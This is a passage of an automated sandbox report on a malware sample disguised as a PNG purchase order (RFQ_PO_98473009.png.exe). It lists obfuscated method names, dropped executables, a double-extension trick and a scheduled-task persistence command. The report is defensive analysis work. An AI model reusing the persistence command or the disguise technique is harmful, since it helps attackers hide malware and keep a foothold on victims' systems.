                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, JiQAtZJeHv6ht9nhcm.csHigh entropy of concatenated method names: 'QaUgdNOACY', 'JuLgMWGp5H', 'tN5g8CCd8c', 'TExgmtrZOo', 'k0IgpRrCrP', 'qsvgEdgf7u', 'T6tgLRRgjR', 'dfjgKiI6KR', 'W86g3k0rFV', 'AQwgDT7dZV'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, sglvJneE79KQRFKHUY.csHigh entropy of concatenated method names: 'Jf9UavP0YS', 'F2DUQ18CjW', 'a25UUPTL2J', 'xrBU0M9XVd', 'ci2U4TYZpT', 'MAEUn3l2su', 'Dispose', 'gabr9K5Rna', 'kX8rWa9AJd', 'cXwrOfsksD'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, jiUAanil8GLiFftG8w.csHigh entropy of concatenated method names: 'D5avOvI48j', 'iAFvXJ3JF3', 'TSsv7ielA1', 'nsavg2MVVG', 'hSfvUU9RHx', 'u9LvcxLQCC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, MuQlawSSIiUgI8GXsvp.csHigh entropy of concatenated method names: 'SYPviJoOWi', 'cdlvzAC1jH', 'iQS0Ty4GXw', 'KXW0So7S1L', 'lbO0GB90NT', 'T410bhWyDh', 'o9Y0Hj6jF8', 'e1C0wcVhxE', 'EjX094bBys', 'hk20WZJJYQ'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, UncyDDyN5AkyBus0ar.csHigh entropy of concatenated method names: 'YNbQPvGNma', 'NFiQiFuvvV', 'p0jrTXlVKf', 'mDMrStBPNI', 'HMWQNf6eZH', 'jQPQuBKlub', 'oSkQA9jdFI', 'WV6Qq4xkMR', 'YPNQI6nGn9', 'PFPQs49Ewq'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, MZ3WuBkShW330iZ6K8.csHigh entropy of concatenated method names: 'XdBQZO4pyx', 'TC1QYYt8ks', 'ToString', 'gymQ9FrUIB', 'ADWQWT0W2a', 'p9AQOIeLlr', 'jaPQXVUMNr', 'R3VQ7AjOCE', 'S7iQgNFrGP', 'OaGQcE0q6f'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, TgQj8ESHW7pT44l2VNw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvHjUv4Wbw', 'EUBjvYRrYL', 'vrVj0LtC6I', 'E3BjjHHv1d', 'tQVj49qF5O', 'tkgjxa8SqX', 'ujNjnE5vbg'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, CFcyJAAWEa6gGKySEJ.csHigh entropy of concatenated method names: 'aHM2KIaAR6', 'EVB233evhY', 'lcP2fh3qtR', 'YCq2Vo5iOT', 'ygn2RfItyC', 'w9F2CVO1u4', 'mLL26tPA5d', 'kCw215QOpY', 'oRw2FOCmY7', 'P5i2NL8Gco'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, RBrBs2OuBrXGxBZrkB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'txNG5ajIbk', 'SdxGi6DCGh', 'O7MGz00Zgf', 'IjtbTInUgl', 'T7AbSFj6su', 'fkYbGO2nVK', 'uKEbbopNPB', 'h13Hd5dcApynUoC9RaS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, Cw01JFRk1BEe55xg7e.csHigh entropy of concatenated method names: 'HYJ7n3a2d6', 'P0w7dNMmB6', 'MQa78SRtBc', 'qVe7mwocLH', 'Awu7EDNIy4', 'GWB7LrtwKP', 'm7273fDVkM', 'zAr7D9sQB2', 'hXRRF0xB14P4VCJbthQ', 'IotAECxLFTx6IGWklKu'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, sLhFCj5FScH9ZYOdn9.csHigh entropy of concatenated method names: 'sL2UfL50yY', 'NewUV45fTX', 'klkUh8ZGWL', 'EtoUR9gpLB', 'HmmUCbQj65', 'DpwUljK7kl', 'JS8U6JH68f', 'JYSU15MM64', 'AlcUJuRhXn', 'RDjUFNC5lH'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, AemJkj6RCt3DUbxNFE.csHigh entropy of concatenated method names: 'AUwg9HobC2', 'GDCgO1NijE', 'F0mg7iU9tS', 'G8l7ih1PWZ', 'TUH7zExsCt', 'WoWgT8OeQm', 'wZSgSIqaoF', 'P1SgGwT7b1', 'y7EgbwKNbv', 'E36gHPJZ4y'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, LBBOL33Va9E5fdq8Rn.csHigh entropy of concatenated method names: 'xPBOmLyOcW', 'z3xOEjJTsJ', 'EQcOKjPyW7', 'oLOO3m3V8Z', 'y3rOafSmG0', 'XW6Ottaqlf', 'dHSOQyVMhy', 'nYxOrFAnSI', 'nEKOUubww3', 'DGpOvW5G2F'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, LwPThgfLaOemDNfGyZ.csHigh entropy of concatenated method names: 'FIc7wXDiV1', 'Bhf7WoSDsr', 'wgH7Xl5fJT', 'HS07gEnuCS', 'cEL7cRC52X', 'tMVXo1nav8', 'X2tXyP26vX', 'zk0XeWaru5', 'rRWXPMe7mV', 'nm4X5fkgu7'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.csHigh entropy of concatenated method names: 'nIAWqdkdmp', 'eqnWI99HAT', 'x1LWsvNpDc', 'R7qWkRZXsP', 'judWo2pK62', 'zK1WykhDh7', 'YjmWeN2yfY', 'IngWPAH0SZ', 'JVDW5EM8qu', 'WuWWiFM1KM'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.csHigh entropy of concatenated method names: 'AFnbwIAtSG', 'sUlb97SXYK', 'mhxbWRBR8s', 'GvpbOIJg3F', 'JfJbXlq5Pp', 'f63b7ktXqi', 'NjFbgcgTLd', 'my5bcUQDqf', 'X0abBFYGta', 'JaRbZ4ICWy'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, BNNes6zuWgY54P8mFR.csHigh entropy of concatenated method names: 'fOOvEX5C2g', 'cKjvKYpwQV', 'zx4v31ji4T', 'rtpvfYctKY', 'k3kvVrV8ih', 'vElvRlr2uX', 'kJ8vCItYOA', 'vysvnPueEb', 'ujMvdAFnU6', 'YgpvMsI7LC'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, yTPxsWGuuavb9FyWob.csHigh entropy of concatenated method names: 'hfY8ZuP7W', 'EC1mRQaP4', 'k9kEL0Uaq', 'MQVLF9Ihl', 'ghG3nPQ89', 'OLmDVomMc', 'pZhistvKwgDQ5aa3wn', 'mQ31oFUQf0TciQ8utC', 'nGmr2ogR4', 'zTYvCU9gS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, TxCZi3DW0nYPtZIDxj.csHigh entropy of concatenated method names: 'eqwXplOEYN', 'JcDXLn0aCH', 'BQFOhQq1C1', 'FK0ORbd1hv', 'OlJOCR65mc', 'n5EOlcCoKU', 'tZ7O68QhC7', 'woFO19TxVI', 'TYaOJQO4r6', 'EAvOF7Zb7W'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tm4DAMWXqKqTsgwPCZ.csHigh entropy of concatenated method names: 'Dispose', 'fKQS5RFKHU', 'v1KGVl8SNY', 'r9roBs9Xqq', 'mIHSipTd5K', 'UAlSzDTYTF', 'ProcessDialogKey', 'x0vGTLhFCj', 'NScGSH9ZYO', 'xn9GGgiUAa'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, mLLEqSHr5ZfiDPsPVl.csHigh entropy of concatenated method names: 'k2rSgGDpxZ', 'oqlScGF0mX', 'EVaSZ9E5fd', 'Q8RSYnkxCZ', 'mIDSaxj6wP', 'ahgStLaOem', 'nL9XisovJvrmYiYpPA', 'cRW87U3Z2Dw7rB1RaG', 'Dx4SSI15Rn', 'ChWSbc1x4I'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, JiQAtZJeHv6ht9nhcm.csHigh entropy of concatenated method names: 'QaUgdNOACY', 'JuLgMWGp5H', 'tN5g8CCd8c', 'TExgmtrZOo', 'k0IgpRrCrP', 'qsvgEdgf7u', 'T6tgLRRgjR', 'dfjgKiI6KR', 'W86g3k0rFV', 'AQwgDT7dZV'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, sglvJneE79KQRFKHUY.csHigh entropy of concatenated method names: 'Jf9UavP0YS', 'F2DUQ18CjW', 'a25UUPTL2J', 'xrBU0M9XVd', 'ci2U4TYZpT', 'MAEUn3l2su', 'Dispose', 'gabr9K5Rna', 'kX8rWa9AJd', 'cXwrOfsksD'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, jiUAanil8GLiFftG8w.csHigh entropy of concatenated method names: 'D5avOvI48j', 'iAFvXJ3JF3', 'TSsv7ielA1', 'nsavg2MVVG', 'hSfvUU9RHx', 'u9LvcxLQCC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, MuQlawSSIiUgI8GXsvp.csHigh entropy of concatenated method names: 'SYPviJoOWi', 'cdlvzAC1jH', 'iQS0Ty4GXw', 'KXW0So7S1L', 'lbO0GB90NT', 'T410bhWyDh', 'o9Y0Hj6jF8', 'e1C0wcVhxE', 'EjX094bBys', 'hk20WZJJYQ'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, UncyDDyN5AkyBus0ar.csHigh entropy of concatenated method names: 'YNbQPvGNma', 'NFiQiFuvvV', 'p0jrTXlVKf', 'mDMrStBPNI', 'HMWQNf6eZH', 'jQPQuBKlub', 'oSkQA9jdFI', 'WV6Qq4xkMR', 'YPNQI6nGn9', 'PFPQs49Ewq'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, MZ3WuBkShW330iZ6K8.csHigh entropy of concatenated method names: 'XdBQZO4pyx', 'TC1QYYt8ks', 'ToString', 'gymQ9FrUIB', 'ADWQWT0W2a', 'p9AQOIeLlr', 'jaPQXVUMNr', 'R3VQ7AjOCE', 'S7iQgNFrGP', 'OaGQcE0q6f'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, TgQj8ESHW7pT44l2VNw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvHjUv4Wbw', 'EUBjvYRrYL', 'vrVj0LtC6I', 'E3BjjHHv1d', 'tQVj49qF5O', 'tkgjxa8SqX', 'ujNjnE5vbg'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, CFcyJAAWEa6gGKySEJ.csHigh entropy of concatenated method names: 'aHM2KIaAR6', 'EVB233evhY', 'lcP2fh3qtR', 'YCq2Vo5iOT', 'ygn2RfItyC', 'w9F2CVO1u4', 'mLL26tPA5d', 'kCw215QOpY', 'oRw2FOCmY7', 'P5i2NL8Gco'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, RBrBs2OuBrXGxBZrkB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'txNG5ajIbk', 'SdxGi6DCGh', 'O7MGz00Zgf', 'IjtbTInUgl', 'T7AbSFj6su', 'fkYbGO2nVK', 'uKEbbopNPB', 'h13Hd5dcApynUoC9RaS'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, Cw01JFRk1BEe55xg7e.csHigh entropy of concatenated method names: 'HYJ7n3a2d6', 'P0w7dNMmB6', 'MQa78SRtBc', 'qVe7mwocLH', 'Awu7EDNIy4', 'GWB7LrtwKP', 'm7273fDVkM', 'zAr7D9sQB2', 'hXRRF0xB14P4VCJbthQ', 'IotAECxLFTx6IGWklKu'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, sLhFCj5FScH9ZYOdn9.csHigh entropy of concatenated method names: 'sL2UfL50yY', 'NewUV45fTX', 'klkUh8ZGWL', 'EtoUR9gpLB', 'HmmUCbQj65', 'DpwUljK7kl', 'JS8U6JH68f', 'JYSU15MM64', 'AlcUJuRhXn', 'RDjUFNC5lH'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, AemJkj6RCt3DUbxNFE.csHigh entropy of concatenated method names: 'AUwg9HobC2', 'GDCgO1NijE', 'F0mg7iU9tS', 'G8l7ih1PWZ', 'TUH7zExsCt', 'WoWgT8OeQm', 'wZSgSIqaoF', 'P1SgGwT7b1', 'y7EgbwKNbv', 'E36gHPJZ4y'
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, LBBOL33Va9E5fdq8Rn.csHigh entropy of concatenated method names: 'xPBOmLyOcW', 'z3xOEjJTsJ', 'EQcOKjPyW7', 'oLOO3m3V8Z', 'y3rOafSmG0', 'XW6Ottaqlf', 'dHSOQyVMhy', 'nYxOrFAnSI', 'nEKOUubww3', 'DGpOvW5G2F'
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile created: C:\Users\user\AppData\Local\Temp\Native_snake01.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: png.exeStatic PE information: RFQ_PO_98473009.png.exe
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
